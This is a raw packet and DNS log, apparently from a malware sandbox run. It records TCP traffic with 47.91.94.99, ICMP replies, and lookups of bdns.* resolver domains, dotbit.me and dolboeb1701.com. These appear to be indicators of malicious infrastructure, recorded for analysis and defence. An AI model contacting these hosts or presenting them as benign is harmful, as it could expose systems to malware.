Feb 23, 2021 17:51:25.991415977 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.991429090 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.991441965 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.991460085 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.991476059 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.991489887 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.991508961 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.991646051 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.991664886 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.991686106 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.991702080 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.991714001 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.991729975 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.991764069 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.991803885 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.991822958 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.991838932 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.991852999 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.991868019 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.991883993 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.991894960 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.991905928 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.991923094 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.991934061 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.991950035 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.991998911 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.992017031 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.992033958 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.992050886 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.992085934 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.992104053 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:25.992139101 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.992223024 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.992259026 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.992276907 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.992340088 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.992454052 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.992470980 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.992481947 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.992500067 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.992561102 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.992630959 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.992674112 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.992692947 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.992708921 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.992796898 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.992839098 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.992882967 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.992925882 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.992943048 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.992988110 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.993030071 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.993067026 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.993105888 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.993150949 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.993213892 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.993227959 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.993266106 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.993309021 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.993362904 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.993379116 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.993422985 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.993442059 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.993458986 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.993469954 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.993515968 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.993532896 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.993542910 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:25.993561029 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:26.032665014 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:26.032720089 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:26.032738924 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:26.032756090 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:26.032772064 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:26.032787085 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:26.032803059 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:26.032814026 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:26.032831907 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:26.032865047 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:26.032879114 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:26.032893896 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:26.032908916 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:26.032927990 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:26.032948017 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:26.033015966 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:26.033077955 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:26.033519030 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:26.033554077 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:26.033580065 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:26.033596039 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:26.033612013 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:26.033627987 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:26.033688068 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:26.035180092 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:26.035202026 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:26.035217047 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:26.035228014 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:26.035238981 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:26.035586119 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:26.035743952 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:26.035824060 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:26.035867929 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:26.035881996 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:26.035897970 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:26.035914898 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:26.035931110 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:26.036020994 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:26.036039114 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:26.036087036 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:26.036132097 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:26.036163092 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:26.036180019 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:26.036247015 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:26.036324024 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:26.036355972 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:26.036403894 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:26.036456108 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:26.036473989 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:26.036586046 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:26.036602020 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:26.036647081 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:26.036667109 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:26.036745071 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:26.036761999 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:26.036828041 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:26.036844015 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:26.036880970 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:26.036916018 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:26.076796055 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:26.076834917 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:26.085927963 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:26.129930973 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:26.398576021 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:26.442487955 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:26.442787886 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:26.442871094 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:26.486557961 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:26.486582041 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:26.486764908 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:26.488457918 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:26.530559063 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:26.530599117 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:26.532210112 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:28.301080942 CET	80	49785	47.91.94.99	192.168.2.6
Feb 23, 2021 17:51:28.301199913 CET	49785	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:29.131288052 CET	49782	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:29.131371975 CET	49783	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:29.131500006 CET	49784	80	192.168.2.6	47.91.94.99
Feb 23, 2021 17:51:29.131541014 CET	49785	80	192.168.2.6	47.91.94.99

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 23, 2021 17:49:15.450937033 CET	62044	53	192.168.2.6	8.8.8.8
Feb 23, 2021 17:49:15.499744892 CET	53	62044	8.8.8.8	192.168.2.6
Feb 23, 2021 17:49:16.474462986 CET	63791	53	192.168.2.6	8.8.8.8
Feb 23, 2021 17:49:16.535067081 CET	53	63791	8.8.8.8	192.168.2.6
Feb 23, 2021 17:49:17.253299952 CET	64267	53	192.168.2.6	8.8.8.8
Feb 23, 2021 17:49:17.302340031 CET	53	64267	8.8.8.8	192.168.2.6
Feb 23, 2021 17:49:17.329408884 CET	49448	53	192.168.2.6	8.8.8.8
Feb 23, 2021 17:49:17.392621040 CET	53	49448	8.8.8.8	192.168.2.6
Feb 23, 2021 17:49:18.508550882 CET	60342	53	192.168.2.6	8.8.8.8
Feb 23, 2021 17:49:18.560178995 CET	53	60342	8.8.8.8	192.168.2.6
Feb 23, 2021 17:49:19.280966043 CET	61346	53	192.168.2.6	8.8.8.8
Feb 23, 2021 17:49:19.329576969 CET	53	61346	8.8.8.8	192.168.2.6
Feb 23, 2021 17:49:20.457705021 CET	51774	53	192.168.2.6	8.8.8.8
Feb 23, 2021 17:49:20.506462097 CET	53	51774	8.8.8.8	192.168.2.6
Feb 23, 2021 17:49:21.415019035 CET	56023	53	192.168.2.6	8.8.8.8
Feb 23, 2021 17:49:21.474304914 CET	53	56023	8.8.8.8	192.168.2.6
Feb 23, 2021 17:49:22.560076952 CET	58384	53	192.168.2.6	8.8.8.8
Feb 23, 2021 17:49:22.622394085 CET	53	58384	8.8.8.8	192.168.2.6
Feb 23, 2021 17:49:23.342909098 CET	60261	53	192.168.2.6	8.8.8.8
Feb 23, 2021 17:49:23.403947115 CET	53	60261	8.8.8.8	192.168.2.6
Feb 23, 2021 17:49:24.347990990 CET	56061	53	192.168.2.6	8.8.8.8
Feb 23, 2021 17:49:24.399152994 CET	53	56061	8.8.8.8	192.168.2.6
Feb 23, 2021 17:49:26.359249115 CET	58336	53	192.168.2.6	8.8.8.8
Feb 23, 2021 17:49:26.489789009 CET	53	58336	8.8.8.8	192.168.2.6
Feb 23, 2021 17:49:26.773441076 CET	53781	53	192.168.2.6	8.8.8.8
Feb 23, 2021 17:49:26.821976900 CET	53	53781	8.8.8.8	192.168.2.6
Feb 23, 2021 17:49:27.208570004 CET	54064	53	192.168.2.6	8.8.8.8
Feb 23, 2021 17:49:27.320461988 CET	53	54064	8.8.8.8	192.168.2.6
Feb 23, 2021 17:49:27.599421024 CET	52811	53	192.168.2.6	8.8.8.8
Feb 23, 2021 17:49:27.648108006 CET	53	52811	8.8.8.8	192.168.2.6
Feb 23, 2021 17:49:27.816673040 CET	55299	53	192.168.2.6	8.8.8.8
Feb 23, 2021 17:49:27.967782974 CET	53	55299	8.8.8.8	192.168.2.6
Feb 23, 2021 17:49:28.368872881 CET	63745	53	192.168.2.6	8.8.8.8
Feb 23, 2021 17:49:28.428523064 CET	53	63745	8.8.8.8	192.168.2.6
Feb 23, 2021 17:49:29.331520081 CET	50055	53	192.168.2.6	8.8.8.8
Feb 23, 2021 17:49:29.382945061 CET	53	50055	8.8.8.8	192.168.2.6
Feb 23, 2021 17:49:30.290426970 CET	61374	53	192.168.2.6	8.8.8.8
Feb 23, 2021 17:49:30.341854095 CET	53	61374	8.8.8.8	192.168.2.6
Feb 23, 2021 17:49:31.307763100 CET	50339	53	192.168.2.6	8.8.8.8
Feb 23, 2021 17:49:31.359466076 CET	53	50339	8.8.8.8	192.168.2.6
Feb 23, 2021 17:49:32.307531118 CET	63307	53	192.168.2.6	8.8.8.8
Feb 23, 2021 17:49:32.356162071 CET	53	63307	8.8.8.8	192.168.2.6
Feb 23, 2021 17:49:33.247431993 CET	49694	53	192.168.2.6	8.8.8.8
Feb 23, 2021 17:49:33.298881054 CET	53	49694	8.8.8.8	192.168.2.6
Feb 23, 2021 17:49:37.105026960 CET	54982	53	192.168.2.6	8.8.8.8
Feb 23, 2021 17:49:37.215457916 CET	53	54982	8.8.8.8	192.168.2.6
Feb 23, 2021 17:49:37.839178085 CET	50010	53	192.168.2.6	8.8.8.8
Feb 23, 2021 17:49:37.949068069 CET	53	50010	8.8.8.8	192.168.2.6
Feb 23, 2021 17:49:38.564748049 CET	63718	53	192.168.2.6	8.8.8.8
Feb 23, 2021 17:49:38.623399973 CET	53	63718	8.8.8.8	192.168.2.6
Feb 23, 2021 17:49:47.811630964 CET	62116	53	192.168.2.6	8.8.8.8
Feb 23, 2021 17:49:47.920927048 CET	53	62116	8.8.8.8	192.168.2.6
Feb 23, 2021 17:49:48.720443010 CET	63816	53	192.168.2.6	8.8.8.8
Feb 23, 2021 17:49:48.829565048 CET	53	63816	8.8.8.8	192.168.2.6
Feb 23, 2021 17:49:49.448127985 CET	55014	53	192.168.2.6	8.8.8.8
Feb 23, 2021 17:49:49.581415892 CET	53	55014	8.8.8.8	192.168.2.6
Feb 23, 2021 17:49:50.347683907 CET	62208	53	192.168.2.6	8.8.8.8
Feb 23, 2021 17:49:50.399132013 CET	53	62208	8.8.8.8	192.168.2.6
Feb 23, 2021 17:49:58.804814100 CET	57574	53	192.168.2.6	8.8.8.8
Feb 23, 2021 17:49:59.021301985 CET	53	57574	8.8.8.8	192.168.2.6
Feb 23, 2021 17:49:59.856854916 CET	51818	53	192.168.2.6	8.8.8.8
Feb 23, 2021 17:49:59.994502068 CET	53	51818	8.8.8.8	192.168.2.6
Feb 23, 2021 17:50:00.663052082 CET	56628	53	192.168.2.6	8.8.8.8
Feb 23, 2021 17:50:00.880533934 CET	53	56628	8.8.8.8	192.168.2.6
Feb 23, 2021 17:50:08.633260965 CET	60778	53	192.168.2.6	8.8.8.8
Feb 23, 2021 17:50:08.690706015 CET	53	60778	8.8.8.8	192.168.2.6
Feb 23, 2021 17:50:09.334327936 CET	53799	53	192.168.2.6	8.8.8.8
Feb 23, 2021 17:50:09.407061100 CET	53	53799	8.8.8.8	192.168.2.6
Feb 23, 2021 17:50:09.962560892 CET	54683	53	192.168.2.6	8.8.8.8
Feb 23, 2021 17:50:10.025598049 CET	53	54683	8.8.8.8	192.168.2.6
Feb 23, 2021 17:50:10.097587109 CET	59329	53	192.168.2.6	8.8.8.8
Feb 23, 2021 17:50:10.116272926 CET	64021	53	192.168.2.6	8.8.8.8
Feb 23, 2021 17:50:10.167186975 CET	53	64021	8.8.8.8	192.168.2.6
Feb 23, 2021 17:50:10.188890934 CET	53	59329	8.8.8.8	192.168.2.6
Feb 23, 2021 17:50:10.649513006 CET	56129	53	192.168.2.6	8.8.8.8
Feb 23, 2021 17:50:10.654897928 CET	58177	53	192.168.2.6	8.8.8.8
Feb 23, 2021 17:50:10.721157074 CET	53	58177	8.8.8.8	192.168.2.6
Feb 23, 2021 17:50:10.752154112 CET	53	56129	8.8.8.8	192.168.2.6
Feb 23, 2021 17:50:11.080637932 CET	50700	53	192.168.2.6	8.8.8.8
Feb 23, 2021 17:50:11.138019085 CET	53	50700	8.8.8.8	192.168.2.6
Feb 23, 2021 17:50:11.247251987 CET	54069	53	192.168.2.6	8.8.8.8
Feb 23, 2021 17:50:11.289123058 CET	61178	53	192.168.2.6	8.8.8.8
Feb 23, 2021 17:50:11.347748995 CET	53	61178	8.8.8.8	192.168.2.6
Feb 23, 2021 17:50:11.372246981 CET	53	54069	8.8.8.8	192.168.2.6
Feb 23, 2021 17:50:11.604058981 CET	57017	53	192.168.2.6	8.8.8.8
Feb 23, 2021 17:50:11.676213980 CET	53	57017	8.8.8.8	192.168.2.6
Feb 23, 2021 17:50:11.790955067 CET	56327	53	192.168.2.6	8.8.8.8
Feb 23, 2021 17:50:11.839633942 CET	53	56327	8.8.8.8	192.168.2.6
Feb 23, 2021 17:50:12.351136923 CET	50243	53	192.168.2.6	8.8.8.8
Feb 23, 2021 17:50:12.413320065 CET	53	50243	8.8.8.8	192.168.2.6
Feb 23, 2021 17:50:12.989609003 CET	62055	53	192.168.2.6	8.8.8.8
Feb 23, 2021 17:50:13.067086935 CET	53	62055	8.8.8.8	192.168.2.6
Feb 23, 2021 17:50:14.205771923 CET	61249	53	192.168.2.6	8.8.8.8
Feb 23, 2021 17:50:14.262811899 CET	53	61249	8.8.8.8	192.168.2.6
Feb 23, 2021 17:50:15.676587105 CET	65252	53	192.168.2.6	8.8.8.8
Feb 23, 2021 17:50:15.733716965 CET	53	65252	8.8.8.8	192.168.2.6
Feb 23, 2021 17:50:17.794228077 CET	64367	53	192.168.2.6	8.8.8.8
Feb 23, 2021 17:50:17.851299047 CET	53	64367	8.8.8.8	192.168.2.6
Feb 23, 2021 17:50:19.877924919 CET	55066	53	192.168.2.6	8.8.8.8
Feb 23, 2021 17:50:19.939094067 CET	53	55066	8.8.8.8	192.168.2.6
Feb 23, 2021 17:50:33.340089083 CET	60211	53	192.168.2.6	8.8.8.8
Feb 23, 2021 17:50:34.380481958 CET	60211	53	192.168.2.6	8.8.8.8
Feb 23, 2021 17:50:34.471158028 CET	53	60211	8.8.8.8	192.168.2.6
Feb 23, 2021 17:50:34.943921089 CET	56570	53	192.168.2.6	8.8.8.8
Feb 23, 2021 17:50:35.001588106 CET	53	56570	8.8.8.8	192.168.2.6
Feb 23, 2021 17:50:35.143054008 CET	58454	53	192.168.2.6	8.8.8.8
Feb 23, 2021 17:50:35.324096918 CET	53	58454	8.8.8.8	192.168.2.6
Feb 23, 2021 17:50:35.496668100 CET	53	60211	8.8.8.8	192.168.2.6
Feb 23, 2021 17:50:47.652534962 CET	55180	53	192.168.2.6	8.8.8.8
Feb 23, 2021 17:50:47.701169014 CET	53	55180	8.8.8.8	192.168.2.6
Feb 23, 2021 17:50:48.075963020 CET	58721	53	192.168.2.6	8.8.8.8
Feb 23, 2021 17:50:48.133177042 CET	53	58721	8.8.8.8	192.168.2.6
Feb 23, 2021 17:50:51.929400921 CET	57691	53	192.168.2.6	8.8.8.8
Feb 23, 2021 17:50:51.980972052 CET	53	57691	8.8.8.8	192.168.2.6
Feb 23, 2021 17:50:56.978113890 CET	52943	53	192.168.2.6	8.8.8.8
Feb 23, 2021 17:50:57.035257101 CET	53	52943	8.8.8.8	192.168.2.6
Feb 23, 2021 17:50:57.682384014 CET	59489	53	192.168.2.6	8.8.8.8
Feb 23, 2021 17:50:57.782000065 CET	53	59489	8.8.8.8	192.168.2.6
Feb 23, 2021 17:50:57.970865011 CET	64022	53	192.168.2.6	8.8.8.8
Feb 23, 2021 17:50:58.060647964 CET	53	64022	8.8.8.8	192.168.2.6
Feb 23, 2021 17:50:58.800149918 CET	60023	53	192.168.2.6	8.8.8.8
Feb 23, 2021 17:50:59.041929007 CET	53	60023	8.8.8.8	192.168.2.6
Feb 23, 2021 17:50:59.484796047 CET	57193	53	192.168.2.6	8.8.8.8
Feb 23, 2021 17:50:59.544714928 CET	53	57193	8.8.8.8	192.168.2.6
Feb 23, 2021 17:51:11.341437101 CET	50248	53	192.168.2.6	8.8.8.8
Feb 23, 2021 17:51:11.392941952 CET	53	50248	8.8.8.8	192.168.2.6

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Feb 23, 2021 17:49:28.029742956 CET	88.80.20.20	192.168.2.6	2c36	(Port unreachable)	Destination Unreachable
Feb 23, 2021 17:49:31.029067993 CET	88.80.20.20	192.168.2.6	2c36	(Port unreachable)	Destination Unreachable
Feb 23, 2021 17:49:38.691605091 CET	88.80.21.20	192.168.2.6	2d36	(Port unreachable)	Destination Unreachable
Feb 23, 2021 17:49:41.703747034 CET	88.80.21.20	192.168.2.6	2d36	(Port unreachable)	Destination Unreachable
Feb 23, 2021 17:49:49.661798000 CET	194.54.82.12	192.168.2.6	d414	(Port unreachable)	Destination Unreachable
Feb 23, 2021 17:49:52.674988031 CET	194.54.82.12	192.168.2.6	d414	(Port unreachable)	Destination Unreachable
Feb 23, 2021 17:50:00.964550972 CET	190.115.26.106	192.168.2.6	98af	(Port unreachable)	Destination Unreachable
Feb 23, 2021 17:50:03.976016045 CET	190.115.26.106	192.168.2.6	98af	(Port unreachable)	Destination Unreachable
Feb 23, 2021 17:50:11.787900925 CET	88.80.20.20	192.168.2.6	2c36	(Port unreachable)	Destination Unreachable
Feb 23, 2021 17:50:14.814985037 CET	88.80.20.20	192.168.2.6	2c36	(Port unreachable)	Destination Unreachable
Feb 23, 2021 17:50:20.923847914 CET	88.80.20.20	192.168.2.6	2c36	(Port unreachable)	Destination Unreachable
Feb 23, 2021 17:50:35.408183098 CET	194.54.82.12	192.168.2.6	d414	(Port unreachable)	Destination Unreachable
Feb 23, 2021 17:50:35.496762991 CET	192.168.2.6	8.8.8.8	d00d	(Port unreachable)	Destination Unreachable
Feb 23, 2021 17:50:38.413292885 CET	194.54.82.12	192.168.2.6	d414	(Port unreachable)	Destination Unreachable
Feb 23, 2021 17:50:44.429487944 CET	194.54.82.12	192.168.2.6	d414	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Feb 23, 2021 17:49:26.359249115 CET	192.168.2.6	8.8.8.8	0x80a0	Standard query (0)	bdns.by	A (IP address)	IN (0x0001)
Feb 23, 2021 17:49:27.208570004 CET	192.168.2.6	8.8.8.8	0x205	Standard query (0)	bdns.by	A (IP address)	IN (0x0001)
Feb 23, 2021 17:49:27.816673040 CET	192.168.2.6	8.8.8.8	0x920a	Standard query (0)	bdns.by	A (IP address)	IN (0x0001)
Feb 23, 2021 17:49:37.105026960 CET	192.168.2.6	8.8.8.8	0xfad	Standard query (0)	bdns.co	A (IP address)	IN (0x0001)
Feb 23, 2021 17:49:37.839178085 CET	192.168.2.6	8.8.8.8	0xba64	Standard query (0)	bdns.co	A (IP address)	IN (0x0001)
Feb 23, 2021 17:49:38.564748049 CET	192.168.2.6	8.8.8.8	0x95df	Standard query (0)	bdns.co	A (IP address)	IN (0x0001)
Feb 23, 2021 17:49:47.811630964 CET	192.168.2.6	8.8.8.8	0xfe24	Standard query (0)	bdns.im	A (IP address)	IN (0x0001)
Feb 23, 2021 17:49:48.720443010 CET	192.168.2.6	8.8.8.8	0xdbd8	Standard query (0)	bdns.im	A (IP address)	IN (0x0001)
Feb 23, 2021 17:49:49.448127985 CET	192.168.2.6	8.8.8.8	0x416d	Standard query (0)	bdns.im	A (IP address)	IN (0x0001)
Feb 23, 2021 17:49:58.804814100 CET	192.168.2.6	8.8.8.8	0xa373	Standard query (0)	bdns.io	A (IP address)	IN (0x0001)
Feb 23, 2021 17:49:59.856854916 CET	192.168.2.6	8.8.8.8	0x995e	Standard query (0)	bdns.io	A (IP address)	IN (0x0001)
Feb 23, 2021 17:50:00.663052082 CET	192.168.2.6	8.8.8.8	0x978	Standard query (0)	bdns.io	A (IP address)	IN (0x0001)
Feb 23, 2021 17:50:10.097587109 CET	192.168.2.6	8.8.8.8	0xcb74	Standard query (0)	bdns.link	A (IP address)	IN (0x0001)
Feb 23, 2021 17:50:10.649513006 CET	192.168.2.6	8.8.8.8	0x8c70	Standard query (0)	bdns.link	A (IP address)	IN (0x0001)
Feb 23, 2021 17:50:11.080637932 CET	192.168.2.6	8.8.8.8	0x83e1	Standard query (0)	bdns.link	A (IP address)	IN (0x0001)
Feb 23, 2021 17:50:11.247251987 CET	192.168.2.6	8.8.8.8	0xc860	Standard query (0)	bdns.nu	A (IP address)	IN (0x0001)
Feb 23, 2021 17:50:33.340089083 CET	192.168.2.6	8.8.8.8	0xaa7d	Standard query (0)	bdns.nu	A (IP address)	IN (0x0001)
Feb 23, 2021 17:50:34.380481958 CET	192.168.2.6	8.8.8.8	0xaa7d	Standard query (0)	bdns.nu	A (IP address)	IN (0x0001)
Feb 23, 2021 17:50:34.943921089 CET	192.168.2.6	8.8.8.8	0x1672	Standard query (0)	bdns.nu	A (IP address)	IN (0x0001)
Feb 23, 2021 17:50:35.143054008 CET	192.168.2.6	8.8.8.8	0x4b04	Standard query (0)	bdns.pro	A (IP address)	IN (0x0001)
Feb 23, 2021 17:50:56.978113890 CET	192.168.2.6	8.8.8.8	0xc378	Standard query (0)	bdns.pro	A (IP address)	IN (0x0001)
Feb 23, 2021 17:50:57.682384014 CET	192.168.2.6	8.8.8.8	0x84bb	Standard query (0)	bdns.pro	A (IP address)	IN (0x0001)
Feb 23, 2021 17:50:57.970865011 CET	192.168.2.6	8.8.8.8	0x691d	Standard query (0)	dotbit.me	A (IP address)	IN (0x0001)
Feb 23, 2021 17:50:58.800149918 CET	192.168.2.6	8.8.8.8	0xd1a9	Standard query (0)	dolboeb1701.com	A (IP address)	IN (0x0001)
